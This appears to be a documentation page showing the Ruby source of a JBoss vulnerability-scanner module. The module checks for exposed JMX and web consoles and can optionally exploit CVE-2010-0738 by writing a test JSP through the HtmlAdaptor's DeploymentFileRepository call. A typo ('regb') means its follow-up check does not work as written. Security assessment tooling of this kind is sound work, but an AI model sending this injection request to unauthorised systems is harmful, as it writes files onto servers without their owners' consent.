Module: JbossVulns

Defined in:
lib/bscan/modules/jboss_vulns.rb

Instance Method Summary collapse

Instance Method Details

#run(*args) ⇒ Object 



5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
 
# File 'lib/bscan/modules/jboss_vulns.rb', line 5

def run *args
  @prop_pref = 'bscan.jboss_vulns.'
  @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
  @mid = args[2]?"JbossVulns.#{args[2]}.":'JbossVulns.' 
  begin
    injectf = get_par 'inject_page', true
    hostports = get_par 'hostport',nil,true
    raise "'hostport' param must be provided" if not hostports
    hostports = [hostports] if not hostports.kind_of?(Array)
    
    hostports.each do |hp|
      host,port,proto = hp.split(':', 3)
      port = '80' if not port
      port = port.to_i
      proto = (port == 443 ? 'https':'http') if not proto
      https = (proto == 'https')

      Log 2, "#{@mid}run input: #{host} #{port} #{proto} #{injectf}"
      
      url = "#{proto}://#{host}:#{port}"
      
      reqb = "GET /jmx-console HTTP/1.1\r\n"
      reqe = "Host: #{host}:#{port}\r\n" +
             "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n\r\n"
      issue = Issue.new "#{@mid.chop}: JBoss Vuln Found", url, "Low", "Firm", nil, nil,nil 

      rsp = make_request_socket host, port, https, reqb + reqe
      Log 2, "#{@mid}run jmx-console: #{reqb + reqe} #{rsp}"
      status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
      if status != '404'
        issue.issue_detail = "/jmx-console is enabled"
        issue.url = url + "/jmx-console"
        issue.http_messages = [Message.new(reqb+reqe,rsp)]
        write_issue_state issue
      end   

      reqb = "GET /web-console HTTP/1.1\r\n"
      rsp = make_request_socket host, port, https, reqb + reqe
      Log 2, "#{@mid}run web-console: #{reqb+reqe} #{rsp}"
      status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
      if status != '404'
        issue.issue_detail = "/web-console is enabled"
        issue.url = url + "/web-console"
        issue.http_messages = [Message.new(reqb+reqe,rsp)]
        write_issue_state issue
      end   
      if injectf
        reqb = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&" +
        "name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hello.war&"+
        "argType=java.lang.String&arg1=hello&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&"+
        "arg3=%3CHTML%3E%3CBODY%3EHello%2C%20we've%20got%20a%20problem%20here!%3C%2FBODY%3E%3C%2FHTML%3E&argType=boolean&arg4=True "+
        "HTTP/1.1\r\n"
        Log 2, "#{@mid}run trying to inject hello: #{reqb+reqe} #{rsp}"
        rsp = make_request_socket host, port, https, reqb + reqe
        status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
        if status != '404' 
          regb = "GET /hello/hello.jsp HTTP/1.1\r\n"
          rsp = make_request_socket host, port, https, reqb + reqe
          if status == '200'
            issue.severity = 'Critical'
            issue.url = url + "/hello/hello.jsp"
            issue.issue_detail = "This JBoss instance is vulnerable to authentication by-pass and arbitrary code injection " +
                                  "as described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738 "+
                                  "A test page has been injected at the following location: #{issue.url}"
            issue.http_messages = [Message.new(reqb+reqe,rsp)]
            write_issue_state issue
          end
        end
       end
      end   
  rescue Exception => e
     Log 0, "#{@mid}run Exception: #{e.message}"
     Log 0, e.backtrace.join("\n")  
  end
end